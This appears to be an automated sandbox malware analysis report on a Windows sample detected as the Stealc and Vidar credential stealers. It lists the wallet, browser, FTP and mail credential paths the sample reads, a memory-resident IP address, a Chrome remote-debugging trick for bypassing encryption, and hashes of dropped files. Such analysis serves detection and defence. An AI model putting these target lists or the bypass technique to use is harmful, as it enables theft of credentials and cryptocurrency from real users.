Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 16.113Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1970779986.0000000000474000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC40C40 sqlite3_bind_zeroblob,	0_2_6CC40C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC40D60 sqlite3_bind_parameter_name,	0_2_6CC40D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB68EA0 sqlite3_clear_bindings,	0_2_6CB68EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CC40B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB66410 bind,WSAGetLastError,	0_2_6CB66410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB660B0 listen,WSAGetLastError,	0_2_6CB660B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6C030 sqlite3_bind_parameter_count,	0_2_6CB6C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB66070 PR_Listen,	0_2_6CB66070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CB6C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF22D0 sqlite3_bind_blob,	0_2_6CAF22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB663C0 PR_Bind,	0_2_6CB663C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB69480 sqlite3_bind_null,	0_2_6CB69480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB694F0 sqlite3_bind_text16,	0_2_6CB694F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB694C0 sqlite3_bind_text,	0_2_6CB694C0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A3EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	20_2_00A3EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A3DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	20_2_00A3DF51

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1570352
Product:	CloudBasic
Start time:	20:51:11
Start date:	06.12.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ec0745bf77524d3c74c33d99cf8965c0
SHA1:	fb8a999984b6ef511cad2b5274f39097f29e9824
SHA256:	6a9bcf5a71115d675d22b7fafec11f27ce9aafd64ea717096b96b9da875bcbbf
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\CBAKEBGIIDAFIDHIIECF	ASCII text, with very long lines (1765), with CRLF line terminators	42594FD09C4DF3B174CF5D59B1CAB13A	1B78FEB748C36A592C468A76BB60E98187D7BE4A	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
C:\ProgramData\CFBFCGID	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	EFD26666EAE0E87B32082FF52F9F4C5E	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
C:\ProgramData\DAEGIDHDHIDGIEBGIJEH	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\EBFHJEGDAFHIJKECFBKJ	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\IDHCGDAFBKFIDHJJJDHCBFBGHD	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	85D6E1D7F82C11DAC40C95C06B7B5DC5	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
C:\ProgramData\JJDHIDBFBFHIJKFHCGIEGIDAEH	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\JJJJEBGD	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	64BCCF32ED2142E76D142DF7AAC75730	30AB1540F7909BEE86C0542B2EBD24FB73E5D629	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3439a686-fe1b-410a-be69-d0719436c47f.tmp	JSON data	F17BAFAFAE69B97946130D0B23ACDF8A	239969B5B97FA69B88F4B2D6D091E892CC2CA7E0	8CB2ED1B2F2FA21B5486E1A5876F7B12E04B9AD5192708E36AC4C9738D80ECA4
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\73ca78f6-7a42-4407-8faa-44bfc1fea2d1.tmp	JSON data	8C3B1AE01E5CC85B6591049E2825C2A7	58257E1F7EF9CFE677721A171E151B4231012E0A	1883CB8ECFF8DB2DCCC8EB405D44851C5AFFD7AB539BFE375688ADA3535A8884
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\744fddfa-5af4-409c-95c5-a47224f9081d.tmp	JSON data	F17BAFAFAE69B97946130D0B23ACDF8A	239969B5B97FA69B88F4B2D6D091E892CC2CA7E0	8CB2ED1B2F2FA21B5486E1A5876F7B12E04B9AD5192708E36AC4C9738D80ECA4
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-675355FC-1E38.pma	data	92FFA33C76F94AEC82BF4D9746E7146E	6A23A7481B37555E6A5FC719368B7B3BCD81AAC4	EEB7F9ED62A58FA628251253C982B794B39D8954DF3237D5BEC51458B03CBD49
